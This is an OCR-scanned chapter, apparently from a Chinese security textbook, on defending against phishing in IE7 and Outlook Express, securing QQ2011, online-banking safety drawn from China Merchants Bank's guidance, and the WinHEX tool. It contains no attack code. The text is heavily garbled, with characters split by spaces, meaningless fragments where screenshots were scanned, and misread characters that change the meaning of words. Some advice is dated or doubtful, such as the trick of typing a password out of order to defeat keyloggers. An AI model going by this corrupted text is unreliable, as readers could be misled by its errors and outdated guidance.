站 ) 来 进行 网 络 诈骗 活动 ,诱骗 访问 者 提供 一 些 私人 信息 ,受骗 者 往往 会 泄露 自己 的 私人 
资料 ,如 信用 卡号 .银行 卡 账户 和 身份 证 号 等 内 容 。 钓 鱼网 站 是 设置 一 个 以 假 乱 真 的 假 网 
站 ,欺骗 网 络 浏览 者 上 当 , 链 接 入 假 网 站 ,木马 程序 趁机 植 入 使 用 者 的 电脑 。 

网 络 钓 鱼 一 词 ,是 由 “Fishing” 和 “Phone” 组 合 而 成 ,由 于 黑客 始祖 起 初 是 用 电话 作 
案 , 所 以 用 “Ph” 来 取代 *F”, 创 造 了 “Phishing”, Phishing 发 音 与 Fishing 相同 。“ 网 络 钓 
鱼 ” 就 其 本 身 来 说 , 称 不 上 是 一 种 独立 的 攻击 手段 ,更 多 的 只 是 诈骗 方法 ,就 像 现实 社会 中 
的 一 些 诈骗 一 样 。 

2. 防备 网 络 钓鱼 的 一 般 常识 

不 要 在 网 上 留 下 可 以 证 明 自 己 身份 的 任何 资料 ,包括 银行 卡号 码 .身份 证 号 和 电子 商 
务 网 站 账户 等 资料 。 也 不 要 把 自己 的 隐私 资料 通过 QQ, MSN 或 电子 邮件 等 软件 传播 ， 
这 些 途 径 往 往 会 被 黑客 利用 。 

3. Windows 用 户 对 网 络 钓鱼 的 防范 

Windows 用 户 访问 互联 网 的 两 个 主要 工具 是 浏览 器 和 电子 邮件 。 

1) IE 浏览 器 防范 网 络 钓鱼 的 设置 

CD 在 IE 中 依次 选择 “工具 ”Internet 选项 ”>“ 安 全 ”>“ 自 定义 级 别 ”, 如 图 7. 19 
所 示 ,在 “安全 设置 ?对 话 框 下 方 展 开 下 拉 列 表 选 择 * 高 ”, 然 后 单 击 “ 重 置 ? 按 钮 。 
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(2) 将 正安 全 级 别 设置 为 “高 "之 后 ,浏览 器 在 访问 网 站 时 会 不 断 弹出 警告 窗口 。 此 
时 需要 将 经 常 访问 的 网 站 添加 到 TE 的 “可 信 站 点 ”列表 中 ,如 图 7. 20 所 示 , 单 击 “ 可 信 站 
点 ”图标 ,然后 单 击 “ 站 点 ”按钮 。 输 入 网 站 地 址 , 单 击 “ 添 加 ”按钮 。 如 果 需 要 添加 更 多 网 
站 可 以 重复 这 些 操作 。 


Internet 区 域 [ [an 安全 mu lng [um ler laa | 
设置 请 为 不 同 区 域 的 we 内 容 指定 安全 设置 2) 


lE .NET Framework 
BE L 浏览 器 应 用 程序 
O 禁用 


国 activer 控件 和 插件 a 


m Atpr//em beidu com ——— | ERO 


4i ~ 
+ 重新 启动 Internet Explorer 之 后 生效 
XESESGR | 


1250 C | [EE | 
[7 IRL M POPMA ESI S BA UE https:) (5) 


[ws | wm» jJ C») x8) 


图 7.19 “安全 设置 "对 话 框 图 7.20 “可 信 站 点 "对话 框 


注意 : 清除 “对 该 区 域 中 的 所 有 站 点 要 求 服务 器 验证 (https:)” 复 选 框 。 

G) 如 图 7. 21 所 示 ,在 IE7 中 依次 选择 “工具 ”一 “仿冒 网 站 筛选 >“ 打开 自动 网 站 
检查 ”, 弹 出 如 图 7. 22 所 示 的 “仿冒 网 站 筛选 ?对 话 框 ,选中 * 打 开 自 动 仿冒 网 站 筛选 ”如 
果 你 不 亲自 启动 这 项 功能 ,过 滤器 将 不 会 连接 到 反 欺 诈 服 务 器 ,不 会 检查 任何 站 点 ) ,然后 
单 击 “ 确 定 ” 按 钮 。 

说 明 : IE7 中 内 嵌 的 钓鱼 欺诈 过 滤器 主要 是 为 了 保护 用 户 远离 钓鱼 欺诈 网 站 ,保护 
急 私 ,并 且 整 个 过 程 做 到 透明 和 灵活 。IE7 采用 向 反 钓鱼 欺诈 服务 器 实时 查询 的 方式 ,而 
不 是 像 一 些 反 间 谍 软 件 那样 定时 下 载 一 份 站 点 列表 文件 ,选择 实时 查询 有 两 个 原因 .: 一 
是 它 能 比 使 用 静态 站 点 列表 方式 提供 更 好 的 保护 ;二 是 可 以 避免 给 网 络 增加 过 重 的 负载 。 
欺诈 过 滤器 确实 可 以 定时 下 载 一 份 已 知 为 安全 的 站 点 列表 ,但 钓鱼 欺诈 攻击 可 以 在 24 一 
48 个 小 时 内 转移 到 新 的 地 址 ,这 比 发 布 站 点 列表 要 更 快 。 另 外 ,如 果 要 求 用 户 不 断 地 下 
载 站 点 列表 还 要 考虑 网 络 负载 因素 ,目前 可 能 用 于 发 动 钓鱼 欺诈 攻击 的 计算 机 数量 要 远 
远 超 过 间谍 软件 的 数量 ,每 小 时 都 去 下 载 新 的 黑 名 单列 表 将 会 严重 影响 网 络 的 正常 流量 。 

2) 电子 邮件 防范 网 络 钓鱼 的 设置 

CD 关闭 预览 面板 。 一 些 钓 鱼 邮件 只 需要 在 电子 邮件 收发 程序 的 预览 面板 中 显示 就 
能 侵入 计算 机 。 因 此 建议 用 户 关 闭 收 件 箱 的 预览 面板 。 在 Outlook Express 6 中 ,打开 
“查看 ”>“ 布 局”, 清除 “显示 预览 窗 格 ” 复 选 框 ,如 图 7. 23 所 示 。 
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4. 电子 邮件 防范 网 络 钓鱼 的 
Windows 下 电子 邮件 软件 很 多 ， 其 中 Mozilla 基金 会 的 雷 鸟 (Thunderbird) 和 Outlook. al 
2003 以 及 Outlook Express 6 是 比较 常用 。 雷 鸟 设置 方法 查看 前 文 ， 这 里 介绍 后 两 者 。 . F 
ng Ye m XOU re des n | uli 
2$ a EE 18 1» $us 775 xou x 


图 7.21 打开 自动 网 站 检查 


Microsoft tò BAASE 


浏览 
AETA 


© ”加 关 闭 自动 仿冒 网站 第 选 (E) 
网 站 地 址 不 会 发 送 给 用 crosoft， 除 丰 悠 选择 检查 网 站 地 址 。 


图 7.22 “仿冒 网 站 筛选 "对话 框 
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预览 窗 格 
通过 预览 窗 格 ， 不 另外 打开 窗口 就 可 以 快速 查看 邮件 。 
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图 7.23. 关闭 预览 面板 
(2) 许多 恶意 邮件 都 是 通过 HTML 代码 达到 目的 的 ,因此 ,如 果 以 纯 文本 方式 阅读 
这 些 邮 件 就 会 让 它们 无 计 可 施 。 在 Outlook Express 6 中 ,打开 “工具 ”一 “选项 ”一 “ 阅 
读 ”, 勾 选 “ 用 纯 文 本 格式 阅读 所 有 信息 " 复 选 框 ,如 图 7. 24 所 示 。 
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图 7.24 以 纯 文 本 方式 阅读 电子 邮件 


另外 ,要 小 心 处 理 电子 邮件 链接 ,钓鱼 者 攻击 计算 机 的 一 条 重要 渠道 是 通过 电子 邮 
件 。 为 了 减 小 因 电 子 邮件 而 感染 病毒 的 风险 ,在 可 疑 电 子 邮 件 中 不 要 单 击 链接 ,邮件 中 显 
示 的 文字 往往 会 掩盖 真实 的 Web 地 址 。 

4. Linux 用 户 对 网 络 钓鱼 的 防范 

Linux 用 户 访问 互联 网 的 两 个 主要 工具 是 浏览 器 (火狐 ) 和 电子 邮件 ( 雷 鸟 )。 相 关 设 
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置 同 IE7 „Outlook Express 6 类 似 。 


7.6 实践 案例 7-5: IM 软件 安全 使 用 


如 今 即 时 通信 (IMD) 软 件 作为 人 们 在 网 络 上 最 主要 的 沟通 方式 之 一 ,其 信息 的 安全 性 
越 来 越 受 到 大 众 的 关注 。 

为 了 有 效 地 防止 QQ 密码 ,个 人 资料 和 聊天 记录 等 本 地 信息 的 丢失 和 被 穷 ,下 面 以 
QQ2011 为 例 简单 介绍 QQ 的 安全 使 用 。 

COD 打开 “QQ2011 设置 ”对话 框 ,如 图 7. 25 所 示 ,在 左 侧 窗口 的 “安全 设置 "标签 里 
选择 “消息 记录 安全 ”, 在 右 侧 窗口 中 , 勾 选 “启用 消息 记录 加 密 ”, 输 入 口令 并 确认 即 可 。 
同时 为 了 保险 一 定 要 勾 选 “启用 加 密 口令 提示 ”, 输 入 提示 问题 和 问题 答案 。 另 外 ,还 可 以 
勾 选 “退出 QQ 时 自动 删除 所 有 消息 记录 ”, 然 后 单 击 “ 确 定 ” 按 钮 。 
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(2) 申请 密码 保护 ,如 图 7. 26 所 示 ,这样 能 够 在 不 幸 被 黑 后 及 时 取 回 密码 。 

(3) 如 图 7. 27 所 示 ,在 左 侧 窗 口 的 “安全 设置 "标签 里 选择 “身份 验证 ”, 在 右 侧 窗口 
中 ,选择 “需要 回答 问题 并 由 我 审核 ”。 

(4) 如 图 7. 28 所 示 ,在 左 侧 窗口 的 “安全 设置 标签 里 选择 * 防 骚扰 设置 ”, 在 右 侧 窗 
口中 , 勾 选 “不 接收 任何 临时 会 话 消息 ”。 

(5) 在 登录 对 话 框 中 , 单 击 “设置 ?按钮 ,弹出 如 图 7. 29 所 示 “ 设 置 " 对 话 框 ,在 其 中 设 
置 代 理 服务 器 。 设 置 好 代理 服务 器 后 别人 只 能 看 到 代理 服务 器 的 TP 地 址 ,而 看 不 到 自己 
fi IP HE. 

(6) 如 图 7. 30 所 示 ,在 左 侧 窗口 的 “基本 设置 标签 里 选择 “软件 更 新 ”, 在 右 侧 窗口 
中 选择 “自动 下 载 ,安装 时 询问 (推荐 )”。 
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职 消 记 住 密码 


为 了 你 在 丢失 密码 时 能 外 径 松 取 回 ,现在 就 去 申请 密码 保护 。 
某 些 服务 格 使 用 到 肚 立 密码 ， 悠 可 以 管理 独立 密码 。 


文件 传 辆 安全 
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图 7.26 申请 密码 保护 
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不 允许 任何 人 


7.27 身份 验证 
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图 7.28 防 骚 扰 设 置 


地 址 ; 
211.84. 161.22 
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图 7.29 代理 设置 


E E E 
自动 更 新 程序 能 够 自动 找到 可 用 更 新 并 通知 悠 。 
请 选择 自动 更 新 QQ 的 方式 : 
有 更 新 时 自动 安装 
自动 下 载 ， 安 装 时 淘 问 (推荐 ) 
不 自动 下 载 更 新 ， 有 更 新 时 提示 
关闭 自动 更 新 


手动 更 新 


您 可 以 立即 检查 更 新 ， 逢 铺 到 最 新 版 本 。 查 看 更 多 信息 请 访问 m ,aq con. 
[ ewm | 


7.30 软件 更 新 
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注意 : 在 登录 框 中 输入 密码 时 ,为 了 防止 键盘 记录 工具 ,可 以 不 按照 正常 顺序 输入 密 
码 , 比 如 密码 是 “123456”, 可 以 先 输入 “34”, 然 后 用 光标 定位 ,分 别 在 “34? 前 后 输入 “12” 和 
“56”, 这 样 键 盘 记 录 工 具 记录 的 是 “341256”。 另 外 ,给 入 密码 时 也 可 以 用 粘贴 的 方法 , 先 
在 记事 本 中 输入 一 串 含 有 正确 密码 的 字符 ,然后 用 鼠标 将 正确 部 分 复制 到 密码 框 中 。 如 
果 在 他 人 电脑 上 使 用 QQ, 关闭 QQ 后 一 定 要 彻底 删除 以 自己 QQ 号 命名 的 文件 夹 。 


7.7 实践 案例 7-6: 网 上 银行 账户 安全 


网 上 银行 是 21 世纪 金融 业 的 一 次 革命 ,是 网 络 时 代 的 金融 业 的 创新 ,是 网 络 经 济 时 
代 的 金融 业 转 型 ,是 传统 银行 业务 的 创新 和 发 展 。 

1. 什么 是 网 上 银行 

网 上 银行 借助 于 互联 网 数字 通信 技术 向 客户 提供 金融 信息 发 布 和 金融 交易 服务 ,是 
传统 银行 业务 在 互联 网 上 的 延伸 ,是 一 种 虚拟 银行 ,没有 传统 精致 的 银行 装修 门面 ,没有 
银行 业务 柜台 和 柜员 ,银行 业务 和 和 运营 模式 与 传统 银行 有 很 大 区 别 ,在 线 为 客户 提供 办 理 
结算 .信贷 服务 的 商业 银行 。 

网 上 银行 提供 “3A” 式 服务 , 即 Anytime( 任 何 时 间 )、Anywhere( 任 何 地 点 )、Anyhow 
(任何 方式 )。 

网 上 银行 对 个 人 提供 的 业务 包括 : 个 人 查询 .个 人 转账 ,代理 缴费 ,挂失 服务 、 外 汇 买 
卖 . 电 子 汇款 和 个 人 投资 理财 。 

网 上 银行 对 公 提 供 的 业务 包括 : 信息 发 布 、 信 贷 、 存 款 、 转 账 和 支付 中 介 、 国 际 业 务 、 
住房 金融 .受托 代理 .基金 托管 .资金 清算 和 保险 箱 。 

2. 网 上 银行 的 发 展 

第 一 个 网 络 银行 于 1995 年 在 美国 诞生 一 一 安全 第 一 银行 “Security First Network 
Bank”。 继 美国 之 后 8 个 月 ,中 国 银行 于 1996 年 建立 了 自己 的 网 上 银行 ,1998 年 开始 提 
供 网 上 银行 服务 ;1998 年 3 月 中 国 第 一 笔 网 上 交易 成 功 ,目前 所 有 的 商业 银行 都 建立 了 
不 同 规 模 的 网 上 银行 ,网 上 银行 是 基于 互联 网 的 虚拟 银行 。 

3. 网 上 银行 安全 隐患 和 可 能 出 现 的 问题 

我 国 的 银行 信息 系统 也 是 比较 先进 的 系统 ,银行 信息 系统 的 信息 安全 涉及 方方面面 。 
网 上 银行 可 以 让 银行 充分 利用 互联 网 来 弥补 网 点 设置 的 不 足 ,为 用 户 提 供 方便 的 银行 服 
务 ,这 是 银行 发 展 的 重点 之 一 。 但 是 ,由 于 网 上 银行 中 涉及 资金 的 转移 ,也 不 免 引 起 一 些 
犯罪 分 子 利用 网 络 安全 和 信息 安全 漏洞 来 盗 穷 银行 账号 和 密码 来 从 事 犯 罪 活 动 。 为 了 防 
范 此 类 犯罪 ,仅仅 提醒 用 户 注意 保护 好 密码 是 不 够 的 ,因为 现在 的 技术 手段 完全 可 以 不 在 
用 户 使 用 的 电脑 旁边 就 可 以 窍 获 用 户 的 账号 和 密码 。 

中 国人 民 银 行 颁布 的 (网 上 银行 业务 管理 暂行 办 法 ) 规 定 :“ 银 行 应 采用 合适 的 加 密 
技术 和 措施 ,以 确认 网 上 银行 业务 用 户 身份 和 授权 ,保证 网 上 交易 数据 传输 的 保密 性 、 真 
实 性 ,保证 通过 网 络 传输 信息 的 完整 性 和 交易 的 不 可 否认 性 ”, 由 上 述 可 以 看 出 网 上 银行 
信息 安全 问题 的 严重 性 ,特别 是 近期 不 断 出 现 的 假冒 银行 网 站 和 假冒 银行 的 安全 通知 电 
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子 邮件 的 问题 ,使 得 网 上 银行 信息 安全 问题 非常 突出 ,主要 总 结 如 下 。 

CD 机 密 性 问题 。 银 行 用 户 在 使 用 网 上 银行 系统 时 要 求 用 户 输入 用 户 账 号 和 密码 等 
机 密 信息 后 ,客户 端 电脑 就 把 此 机 密 数 据 通过 互联 网 传 到 网 上 银行 的 服务 器 ,这 个 传输 过 
程 中 要 经 过 许多 网 络 设备 和 传输 链 路 (特别 是 有 些 不 安全 的 宽带 接 入 方式 使 得 整个 办 公 
楼 或 居民 小 区 的 所 有 用 户 实际 上 是 在 一 个 共享 的 局 域 网 上 ) ,如 果 此 类 机 密 信息 不 加 密 传 
输 , 则 极 有 可 能 在 传输 过 程 中 被 非法 截取 而 被 盗 走 用 户 网 上 银行 的 登录 账号 和 密码 ,这 就 
可 以 解释 为 何 用 户 没有 “泄露 ?密码 ,但 银行 账户 上 的 钱 还 是 不 辟 而 飞 。 

(2) 完整 性 问题 。 如 果 在 用 户 端 电脑 到 网 上 银行 服务 器 之 间 的 转账 信息 传输 不 加 密 
的 话 , 则 极 有 可 能 在 传输 过 程 中 被 非法 恶意 算 改 ,把 转账 给 甲 的 银行 账号 算 改 为 转账 给 乙 
的 银行 账号 ,而 用 户 还 不 知晓 ,因为 用 户 提交 时 是 填写 正确 的 。 

(3) 真实 身份 认证 问题 。 涉 及 两 个 真实 身份 的 认证 问题 ,一 个 是 网 上 银行 用 户 的 真 
实 身份 , 另 一 个 是 网 上 银行 网 站 的 真实 身份 。 非 法 用 户 可 以 伪造 .假冒 网 上 银行 网 站 和 银 
行 用 户 的 身份 ,因此 用 户 无 法 知道 他 们 所 登录 的 网 站 是 否 是 可 信 的 真实 的 网 上 银行 网 站 ， 
而 银行 也 无 法 验证 登录 到 网 上 银行 的 用 户 是 否 是 合法 身份 , 仅 凭 * 用 户 名 十 口令 ”的 传统 
身份 认证 方式 根本 就 没有 任何 安全 性 。 而 有 些 银行 声称 "对 由 于 用 户 泄 露 口令 而 导致 损 
失 不 负责 任 ” 的 说 法 是 不 负责 任 的 做 法 ,建议 用 户 不 要 使 用 有 此 类 声明 的 网 上 银行 。 银 行 
应 该 采取 切实 可 行 的 技术 手段 来 保证 即使 用 户口 令 被 泄露 (更 何况 犯罪 分 子 可 以 有 许多 
途径 得 到 用 户 的 口令 ,而 不 是 用 户 的 过 错 ) 非 法 用 户 也 无 法 通过 真实 身份 认证 ,同时 也 要 
采取 技术 措施 让 用 户 非常 容易 识别 是 真正 的 网 上 银行 网 站 还 是 假冒 的 网 上 银行 网 站 , 仅 
仅 提醒 用 户 记 住 复杂 的 英文 域名 和 网 址 是 不 够 的 ,因为 假冒 银行 网 站 的 域名 往往 与 真实 
银行 网 站 只 差 一 个 字母 。 

(4) 交易 的 不 可 和 否认 性 问题 。 银 行 用 户 有 可 能 会 否认 其 在 线 转账 交易 行为 ,这 里 有 
许多 原因 ,可 能 是 用 户 本 身 的 原因 ,也 可 能 是 银行 的 原因 ,每 笔 交 易 一 定 要 有 可 靠 的 签名 
记录 用 于 纠纷 仲裁 的 法 律 依据 。 

4. 网 上 银行 出 现 的 安全 问题 

网 上 银行 越 来 越 深 入 人 们 的 日 常生 活 , 通 过 网 上 银行 ,可 以 迅速 办 理 查 询 、 汇 款 、 转 
账 .外 汇 交 易 和 基金 买卖 等 各 种 金融 业务 。 但 网 上 银行 的 安全 问题 也 是 人 们 所 关心 的 , 目 
前 各 银行 的 网 上 银行 都 具备 符合 标准 的 安全 系统 及 措施 ,确保 客户 权益 能 得 到 充分 保障 。 
如 交通 银行 的 网 上 银行 就 采取 了 许多 安全 防范 措施 ,其 中 包括 附加 码 校 验 ,以 防止 程序 测 
试 密码 攻击 。 网 上 银行 的 防范 措施 是 很 严密 的 。 虽 然 目 前 各 商业 银行 都 有 意识 地 提高 了 
网 上 银行 的 安全 系数 ,但 是 保护 网 银 账户 的 安全 ,并 不 仅仅 是 银行 的 工作 ,客户 也 应 采取 
措施 规避 各 类 风险 。 比 如 网 上 钓鱼 是 目前 国内 外 不 法 分 子 常用 的 欺骗 手段 ,利用 人 们 视 
觉 的 马虎 ,制造 假 网 址 ,例如 ,将 www. bank-of-china. com. cn 改写 为 www. bank-off- 
china. com. cn 等 。 

5. 网 上 银行 的 安全 防范 

开展 网 上 银行 有 两 大 保障 : 一 是 技术 保障 ,二 是 法 律 与 规范 。 

技术 保障 有 网 络 层 安全 防范 和 PKI 技术 。 网 络 层 安 全 防范 措施 有 设置 过 滤 功 能 的 
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安全 路 由 器 .设置 IDS、 设 置 防 黑客 软件 系统 等 ,网 上 银行 安全 防范 在 网 络 层 实施 安全 机 
制 是 安全 防范 的 重点 之 一 。PKI 是 网 上 银行 目前 最 佳 的 防范 措施 。 

国家 在 2005 年 4 H 1 日 颁布 并 执行 了 中 国 “ 电 子 签名 法 ”, 人 民 银 行 发 布 了 “电子 支 
付 指引 ”。 这 是 网 上 银行 的 法 律 依据 。 

6. 招商 银行 网 上 个 人 银行 安全 指引 

在 使 用 网 上 银行 时 ,必须 注意 自身 的 安全 防范 ,下 面 通过 引用 “招商 银行 网 上 个 人 银 
行 安全 指引 ”中 的 主要 内 容 介绍 使 用 网 上 银行 时 要 注意 的 事项 。 

网 址 是 http://www. cmbchina. com/ personal 十 business/ netbank/ common/ safe. htm, 

CD. 网 上 个 人 银行 大 众 版 和 专业 版 。 在 进行 便利 的 网 上 交易 服务 时 ,新 的 网 络 交易 
风险 随 之 产生 。 招 商 银行 为 客户 提供 的 网 上 银行 服务 分 为 : 网 上 个 人 银行 大 众 版 和 专 
业 版 。 

CD 网 上 个 人 银行 大 众 版 是 招商 银行 基于 互联 网 平台 开发 的 .通过 互联 网 为 广大 客户 
提供 全 天 候 银 行 金融 服务 的 自助 理财 系统 。 只 要 客户 拥有 招商 银行 账户 和 密码 即 可 登录 
大 众 版 进行 查询 账户 交易 ,转账 汇款 ,支付 卡 转账 ,修改 密码 等 操作 。 

网 上 个 人 银行 大 众 版 为 “卡号 十 密码 ”登录 方式 ,卡号 、 密 码 的 保管 非常 重要 ,如 果 卡 
号 和 密码 不 慎 被 他 人 取得 ,他 人 即 可 通过 网 上 银行 大 众 版 通过 转账 .网 上 支付 卡 转账 等 方 
式 窃取 客户 账户 资金 。 因 此 ,对 于 使 用 大 众 版 进行 交易 的 客户 ,请 妥善 保管 好 你 的 卡号 和 
密码 ,防止 账户 失窃 。 

@ 网 上 个 人 银行 专业 版 是 招商 银行 基于 互联 网 平台 开发 的 网 上 个 人 银行 理财 软件 ， 
采取 严密 的 X. 509 标准 数字 证 书 体系 ,通过 国家 安全 认证 。 运 用 数字 签名 技术 和 基于 证 
书 的 强加 密 通信 管道 ,确保 客户 身份 认证 和 数据 传输 以 及 密码 输入 的 安全 。 该 软件 建立 
在 严格 的 客户 身份 认证 基础 上 ,对 参与 交易 的 客户 发 放 证 书 , 交 易 时 验证 证 书 。 

网 上 个 人 银行 专业 版 建立 在 “数字 证 书 ” 的 存储 、 使 用 基础 上 ,专业 版 为 “数字 证 书 十 
密码 ”的 登录 方式 ;数字 证 书 分 为 文件 数字 证 书 和 移动 数字 证 书 两 种 ,文件 数字 证 书 可 保 
存在 电脑 、 移 动 介质 中 ,并 可 进行 复制 ,安全 性 较 大 众 版 大 幅 提升 ;移动 数字 证 书 是 一 个 带 
智能 芯片 .形状 类 似 于 U 盘 的 硬件 设备 ,并 应 用 智能 芯片 信息 加 密 技 术 的 一 种 数字 签名 
工具 ;不 可 查看 、 复 制 ,具有 唯一 性 ,客户 进行 登录 交易 需 同时 持 有 移动 数字 证 书 和 客户 密 
码 方 可 登录 专业 版 ,任何 人 都 无 法 利用 你 的 身份 信息 和 账户 信息 通过 互联 网 盗 取 你 的 资 
金 。“ 移 动 数字 证 书 ” 是 最 安全 的 交易 方式 。 

(2) 网 上 支付 功能 是 招商 银行 提供 的 网 上 支付 平台 ,满足 客户 日 常 网 上 消费 需要 。 
招商 银行 网 上 支付 分 为 大 众 版 网 上 支付 和 专业 版 网 上 支付 两 种 形式 。 

大 众 版 网 上 支付 通过 “卡号 十 支付 密码 ”方式 支付 ,目前 提供 支付 卡 、 一 卡通 和 信用 卡 
的 网 上 支付 。 由 于 该 方式 仍 存在 一 定 的 风险 ,银行 为 客户 自动 设置 了 单 笔 和 每 日 支付 限 
额 。 其 中 支付 卡 和 一 卡通 每 日 最 高 支付 额度 为 5000 元 人 民 币 ,信用 卡 每 日 最 高 支付 额度 
为 可 用 额度 ;客户 可 根据 消费 习惯 通过 “一 网 通 ” 大 众 版 更 改 消费 限额 以 降低 交易 风险 。 
支付 密码 ,请 不 要 和 一 卡通 的 取款 密码 相同 。 

专业 版 网 上 支付 通过 “数字 证 书 十 取款 密码 ”的 方式 支付 ,该 支付 方式 安全 性 高 ,银行 
未 给 客户 设置 单 笔 和 每 日 支付 限额 .建议 客户 通过 专业 版 根据 消费 习惯 自行 设置 支付 限 
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额 以 降低 风险 ;同时 ,对 于 大 额 的 网 上 消费 ,建议 客户 使 用 专业 版 进行 支付 。 

(3) 登录 正确 的 网 址 。 招 商 银行 网 上 银行 品牌 为 “一网通 ”。 

招商 银行 全 国 网 上 银行 网 址 为 http://www. cmbchina. com。 建 议 客户 将 该 网 址 添 
加 至 收藏 夹 ,并 直接 通过 访问 ,不 建议 客户 通过 其 他 网 站 链接 进行 访问 ,防止 不 法 分 子 将 
网 址 链接 到 其 他 非法 网 站 窃取 资料 。 

在 进行 网 上 支付 交易 时 ,在 输入 卡号 密码 的 页 面 上 ,请 你 确认 浏览 器 地 址 栏 里 的 地 
址 ,前 面部 分 必须 是 http://www. cmbchina. com。 

此 外 ,如 果 访 问 * . embchina. com 类 网 址 ,如 果 * 为 wma, mobile, info, 则 该 类 网 址 
为 招商 银行 系列 合法 网 址 。 

(4) 认 清 网 页 特征 。 招 商 银行 网 上 银行 网 页 下 方 有 “网 安 ” 图 标 , 如 图 7. 31 所 示 ,如 
单 击 该 图 标 ,图 标 中 的 备案 编号 为 4403101210120, 如 图 7. 32 Bron. 


招商 银行 — 网 上 个 人 银行 - Firefox - 火狐 中 国 版 
文件 四 MBU SFV PEY (EQ 工具 


GEH" ce x ox BOr 
ORR 一 网 上 个 人 银行 


MRT- GRET—JULUS 
* 2010 招商 银行 版 公所 有 
ICP 许 可 证 号 $B2-20040497 
TEIN i 


图 7.31 “网 安 " 图 标 


图 7.32 招商 银行 备案 编号 4403101210120 


(5) 保管 好 账号 和 密码 。 银 行 账号 和 密码 是 保障 客户 银行 资金 安全 的 最 重要 因素 ， 
对 账号 和 密码 的 保管 非常 重要 。 一 旦 客户 的 账号 和 密码 被 他 人 资 取 ,客户 的 银行 资金 就 
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有 可 能 被 次 用。 为 了 保障 客户 的 银行 资金 安全 ,请 客户 务必 重视 账号 、 密 码 的 保管 工作 ， 
尽量 做 到 以 下 几 点 。 

CD 在 任何 情况 下 ,坚持 账号 和 密码 自己 保管 .不 透露 给 任何 人 的 原则 。 不 要 相信 任 
何 通过 电子 邮件 ,短信 或 电话 等 方式 索要 账号 和 密码 的 行为 。 若 有 任何 怀疑 ,请 立即 致电 
95555 与 招商 银行 联系 。 对 于 已 经 向 不 明 人 员 或 网 站 提供 网 上 银行 密码 的 ,要 立即 登录 
网 上 银行 修改 密码 ,或 到 柜 面 进行 密码 重 置 ,或 通过 电话 及 登录 网 上 银行 申请 挂失 。 

@ 尽量 做 到 密码 不 容易 被 不 法 分 子 破 解 。 不 采用 生日 数字 ,电话 号 码 或 身份 证 号 码 
中 的 连续 几 位 ,银行 卡号 中 的 几 位 同一 数字 、 简 单数 字 规 则 构成 的 密码 。 避 免 密码 被 不 
法 分 子 破解 , 盗 取 账户 资金 。 

@ 使 用 单独 的 银行 密码 。 将 平时 在 其 他 网 站 使 用 的 各 类 密码 与 银行 密码 区 分 开 ,不 
采用 同一 密码 ,避免 因 在 其 他 网 站 泄露 密码 导致 银行 密码 同时 失窃 。 

使 用 不 同 的 银行 查询 密码 .取款 密码 和 网 上 支付 密码 。 不 同 的 多 重 密码 能 更 有 效 地 
保障 客户 账户 资金 的 安全 。 

请 不 要 在 招商 银行 网 上 银行 系统 以 外 的 其 他 地 方 输入 卡号 和 密码 。 不 定期 修改 自己 
的 密码 。 

(6) 保证 计算 机 安全 。 计 算 机 及 软件 有 可 能 受到 病毒 及 电脑 黑客 的 威胁 ,请 留意 以 
下 几 点 。 

CD. 设置 由 数字 ,字母 (大 小写) 构成 的 不 易 被 破译 的 开机 密码 。 

@ 定期 下 载 安装 最 新 的 操作 系统 和 浏览 器 安全 程序 或 补丁 。 

@ 建议 将 计算 机 中 的 hosts 文件 修改 为 只 读 。 

@ 安装 个 人 防火 墙 , 可 以 防止 黑客 人 侵 你 的 计算 机 。 

© 安装 并 及 时 更 新 杀毒 软件 , 养 成 定期 更 新 杀毒 软件 的 习惯 ,防止 新 型 病毒 人 侵 。 

使 用 网 上 银行 的 电脑 不 作为 资料 ,文件 共享 等 类 型 的 服务 器 。 

CD 不 要 开启 来 历 不 明 的 电子 邮件 。 

C) 增强 安全 意识 。 随 着 科技 的 发 展 ,金融 网 络 犯罪 手法 越 来 越 多 ,但 所 有 的 金融 网 
络 犯罪 根源 为 盗 取 客户 的 账号 和 密码 。 尽 管 银行 在 安全 方面 采取 了 各 种 措施 ,保障 银行 
交易 系统 的 安全 ,但 客户 的 账号 和 密码 的 保管 也 依赖 于 客户 自己 的 安全 风险 意识 和 行为 。 

(D 不 要 在 公共 场所 使 用 网 上 银行 ,防止 他 人 偷 看 你 的 密码 。 

© 不 要 在 网 吧 、 图 书馆 等 公用 网 络 上 使 用 网 上 银行 .防止 他 人 安装 监测 程序 或 木马 
程序 窃取 账号 和 密码 。 

© 每 次 使 用 网 上 银行 后 ,及 时 退出 。 

@ 在 其 他 渠道 (如 ATM 取款 、 自 助 终端 登录 ) 进 行 交易 时 ,注意 密码 输入 的 保护 措 
施 , 防 止 他 人 通过 录像 等 方式 窃取 到 你 的 账号 和 密码 。 

© 切 勿 向 他 人 透露 你 的 用 户 名 密码 或 任何 个 人 身份 识别 资料 。 

© 如 果 客 户 自己 的 个 人 资料 有 任何 更 改 (例如 ,联系 方式 、 地 址 等 有 变动 ) ,请 及 时 通 
过 银行 系统 修改 相关 资料 。 

D 定期 查看 自己 的 交易 ,核对 对 账单 。 

遇 到 任何 怀疑 或 问题 ,请 及 时 联系 招商 银行 全 国 统一 客服 电话 一 一 95555 。 
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7.8 实践 案例 7-7: 其 他 网 络 应 用 安全 


WinHEX 软件 含 十 六 进 制 编辑 器 、 磁 盘 编 辑 器 和 RAM 编辑 器 ,可 帮助 我 们 实现 计 
算 机 调查 取证 ,文件 及 磁盘 数据 恢复 、 磁 盘 的 底层 数据 处 理 , 以 及 密码 分 析 、 软 件 注 册 等 信 
息 安 全 工作 。 它 能 检查 并 且 编辑 各 种 文件 ,从 磁盘 驱动 器 中 恢复 已 删 文件 或 丢失 的 数据 ， 
支持 USB Disk 和 数码 相机 的 存储 卡 。 

WinHEX 的 主要 功能 如 下 。 

(1) 磁盘 编辑 器 ,可 分 析 硬 盘 、 软 盘 `CD-ROMIDVD,USBDisk ,存储 卡 。 

(2) 支持 FAT ,NTFS,Ext213, ReiserFS, Reiser ,LLTFS,CDFS 和 UDF 等 文件 系统 。 

(3) 支持 RAID 系统 和 动态 磁盘 组 。 

(4) 多 种 数据 恢复 技术 。 

(5) RAM 编辑 器 ,提供 编辑 物理 RAM 和 其 他 进程 的 虚拟 内 存 方法 。 

(6) 灵活 地 查找 并 替换 功能 ,可 实现 文本 .十 六 进 制 数据 等 形式 的 查找 。 

(7) 磁盘 克隆 ( 需 在 DOS 方式 下 实现 ) 。 

(8) 安全 性 由 256 位 的 AES 加 密 、 检 验 和 、`CRC32、 哈 希 算法 C MDS 和 SHA-1) 等 方 
法 提供 支持 。 

(9) 安全 控 除 个 人 秘密 文件 功能 ,可 实现 全 盘 数 据 清理 。 

